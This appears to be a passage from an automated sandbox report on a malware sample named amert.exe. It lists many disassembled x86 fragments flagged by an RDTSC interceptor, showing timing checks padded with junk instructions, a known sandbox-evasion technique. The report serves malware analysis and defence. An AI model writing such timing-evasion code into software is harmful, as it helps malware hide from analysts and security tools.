Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82785F second address: 827919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0D755569BEh 0x0000000a popad 0x0000000b push eax 0x0000000c jnc 00007F0D755569D8h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F0D755569B8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d jmp 00007F0D755569C8h 0x00000032 mov cx, 4B59h 0x00000036 lea eax, dword ptr [ebp+1247B356h] 0x0000003c jmp 00007F0D755569C8h 0x00000041 sub ecx, dword ptr [ebp+122D28AEh] 0x00000047 nop 0x00000048 jmp 00007F0D755569BEh 0x0000004d push eax 0x0000004e jp 00007F0D755569BEh 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827919 second address: 827962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F0D7471B5D8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 0000001Ch 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 jmp 00007F0D7471B5DCh 0x00000025 lea eax, dword ptr [ebp+1247B312h] 0x0000002b movsx ecx, ax 0x0000002e push eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 jno 00007F0D7471B5D6h 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827962 second address: 827966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827966 second address: 82796F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82796F second address: 827975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827975 second address: 811628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D3B47h] 0x0000000f mov edx, ebx 0x00000011 call dword ptr [ebp+122D59A4h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jmp 00007F0D7471B5DCh 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 861DD8 second address: 861DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8620AE second address: 8620C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F0D7471B5DEh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8620C6 second address: 8620CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8620CC second address: 8620E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D7471B5E6h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8620E6 second address: 8620EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86B312 second address: 86B338 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0D7471B5E6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F0D7471B5D6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A181 second address: 86A186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A2D3 second address: 86A2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D7471B5E9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A2F0 second address: 86A310 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F0D755569C5h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A310 second address: 86A316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A450 second address: 86A458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A458 second address: 86A46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D7471B5D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F0D7471B5D6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A46D second address: 86A47F instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D755569B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F0D755569B6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86A47F second address: 86A485 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 86AB30 second address: 86AB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 871264 second address: 8712B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F0D7471B5DFh 0x0000000f jmp 00007F0D7471B5E4h 0x00000014 jmp 00007F0D7471B5E3h 0x00000019 popad 0x0000001a jnp 00007F0D7471B610h 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 874421 second address: 874425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 874425 second address: 87443F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F0D75558556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F0D75558556h 0x00000013 ja 00007F0D75558556h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87443F second address: 874453 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F0D755569D6h 0x00000009 jbe 00007F0D755569D6h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 874453 second address: 874457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 874457 second address: 87445D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87445D second address: 874469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 873CC7 second address: 873CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E8h 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87955F second address: 879575 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007F0D75558556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 js 00007F0D75558556h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879575 second address: 879579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879579 second address: 879581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879581 second address: 87958B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0D755569D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87958B second address: 879595 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D75558556h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879595 second address: 8795E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0D755569D8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnp 00007F0D755569DEh 0x00000015 pushad 0x00000016 popad 0x00000017 je 00007F0D755569D6h 0x0000001d jc 00007F0D755569DAh 0x00000023 push edx 0x00000024 pop edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 jmp 00007F0D755569E5h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F0D755569DCh 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A18 second address: 879A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A20 second address: 879A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A24 second address: 879A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F0D75558556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F0D75558556h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A3A second address: 879A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A3E second address: 879A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A42 second address: 879A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879A48 second address: 879A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F0D75558562h 0x00000010 jnl 00007F0D75558556h 0x00000016 jc 00007F0D75558556h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879D2F second address: 879D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569DFh 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007F0D755569E6h 0x00000010 jmp 00007F0D755569E7h 0x00000015 pop edi 0x00000016 jmp 00007F0D755569E7h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879D8D second address: 879D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827285 second address: 827293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569DAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827293 second address: 82731B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F0D75558567h 0x00000010 mov ebx, dword ptr [ebp+1247B351h] 0x00000016 xor dword ptr [ebp+122D28F8h], edi 0x0000001c add eax, ebx 0x0000001e mov dword ptr [ebp+122D295Eh], ebx 0x00000024 sub edx, 57973125h 0x0000002a nop 0x0000002b pushad 0x0000002c push edi 0x0000002d push eax 0x0000002e pop eax 0x0000002f pop edi 0x00000030 push ebx 0x00000031 push edi 0x00000032 pop edi 0x00000033 pop ebx 0x00000034 popad 0x00000035 push eax 0x00000036 jbe 00007F0D7555855Ah 0x0000003c nop 0x0000003d or ecx, 5FFEA9EBh 0x00000043 push 00000004h 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007F0D75558558h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 00000015h 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F0D7555855Bh 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82731B second address: 827325 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0D755569D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 879F01 second address: 879F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D75558565h 0x00000009 pop edi 0x0000000a push esi 0x0000000b jnp 00007F0D75558556h 0x00000011 jmp 00007F0D75558568h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87A0AF second address: 87A0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 87D858 second address: 87D85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8810BB second address: 8810C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8811EF second address: 8811FD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0D75558556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8811FD second address: 881207 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D755569D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8814BF second address: 8814C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 889CE1 second address: 889CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0D755569DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F0D755569D6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 889CFE second address: 889D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 889D02 second address: 889D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F0D755569DCh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 889D17 second address: 889D31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D75558565h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 887F61 second address: 887F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8888FA second address: 8888FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8888FE second address: 888902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888902 second address: 888921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D75558569h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888BDC second address: 888BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888E55 second address: 888E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888E5B second address: 888E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F0D755569E7h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888E79 second address: 888E8B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D7555855Ch 0x00000008 jno 00007F0D75558556h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888E8B second address: 888E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 888E8F second address: 888E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 889A1D second address: 889A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0D755569D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8932C9 second address: 8932D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8932D3 second address: 8932F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F0D755569D8h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F0D755569E1h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8932F9 second address: 8932FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89245E second address: 892462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892753 second address: 89275E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0D75558556h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89275E second address: 89277C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E9h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89277C second address: 892788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892788 second address: 89278E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89278E second address: 892796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892796 second address: 89279B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8928EB second address: 8928F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8928F8 second address: 892917 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D755569E2h 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892D69 second address: 892D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892D6F second address: 892D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569E8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 892EB9 second address: 892EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 899D45 second address: 899D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89A2C1 second address: 89A2C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 89A43F second address: 89A44F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0D755569DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
